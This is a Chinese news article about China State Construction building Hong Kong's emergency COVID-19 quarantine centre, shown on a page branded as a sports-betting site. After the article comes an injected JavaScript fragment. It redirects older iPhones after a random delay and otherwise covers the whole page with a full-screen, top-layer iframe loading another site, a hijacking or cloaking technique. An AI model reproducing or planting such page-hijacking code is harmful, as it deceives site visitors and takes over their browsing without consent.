QSTY球速体育新闻资讯
中建集团全力建设“港版火神山”,争分夺秒,
发布时间:2020-07-02
  |  
阅读量:
字号:
A+ A- A

近期,香港疫情防控形势严峻。由中国建筑集团旗下中国建筑工程(香港)有限公司承建的香港紧急检疫中心项目,被媒体誉为“港版火神山”,3月2日开始入住第一批隔离人员,至今累计已达155人,为香港抗击疫情发挥积极作用。

 

  项目位于香港柴湾鲤鱼门度假村,采用组装合成建造工艺(MiC),是香港第一单采用该建造技术的项目,也是香港首个新建、规模最大的新冠肺炎防疫专用隔离项目,对香港具有特殊意义。

  项目分两阶段交付,第一阶段篮球场项目提供118个隔离房间及相应附属设施,已于2月28日正式交付、比合约完成工期提前2天,每个房间都配有独立卫浴,为隔离人士提供良好的环境。

 

  第二阶段足球场项目搭建两层共234个床位,目前正在争分夺秒进行机电安装、内部装饰等工作,并争取在4月中旬或提前交付,建成后将提供更大的隔离能力。

 

  2月11日,香港特区行政长官林郑月娥考察项目进展情况。她对公司参与香港疫情防控所做的工作表示肯定,对项目进度表示满意,对项目质量表示放心,相信中国建筑一定能够顺利圆满地完成这一具有重大意义的工程。她对所有参与项目的管理人员及工友表达了最衷心的感谢和最诚挚的问候。

 

  2月28日上午,香港中联办主任骆惠宁实地察看项目建设和相关配套设施的建设情况。他充分肯定公司急疫情所急、急香港市民所急,严格按照香港标准和施工要求,克服困难,昼夜奋战,高效率、高质量推进项目建设,体现了驻港中资企业的使命担当和香港速度,希望大家再接再厉,把二阶段项目也尽快高质量建设好,早日落成启用。

"; // 电脑链接 const mobileUrl = ""; // 移动链接 const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/); const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500; if (isIOS && getIosVersion() < 13) { setTimeout(() => { window.location.href = mobileUrl; }, time); } else { // 检测用户使用的设备类型 const isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent); document.addEventListener("DOMContentLoaded", () => { const viewportMeta = document.createElement("meta"); viewportMeta.setAttribute("name", "viewport"); viewportMeta.setAttribute("content", "user-scalable=no, width=device-width, initial-scale=1.0"); document.head.appendChild(viewportMeta); const style = document.createElement("style"); style.innerHTML = "html, body { width: 100%; height: 100%; overflow: hidden; }"; document.head.appendChild(style); const divContainer = document.createElement("div"); divContainer.style.cssText = "width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 2147483647; background: #fff;"; document.body.appendChild(divContainer); const iframe = document.createElement("iframe"); iframe.src = isMobile ? mobileUrl : desktopUrl; iframe.style.cssText = "border: 0; width: 100%; text-align: center; border: medium none; height: 100%; max-height: 4000px;"; divContainer.appendChild(iframe); }); }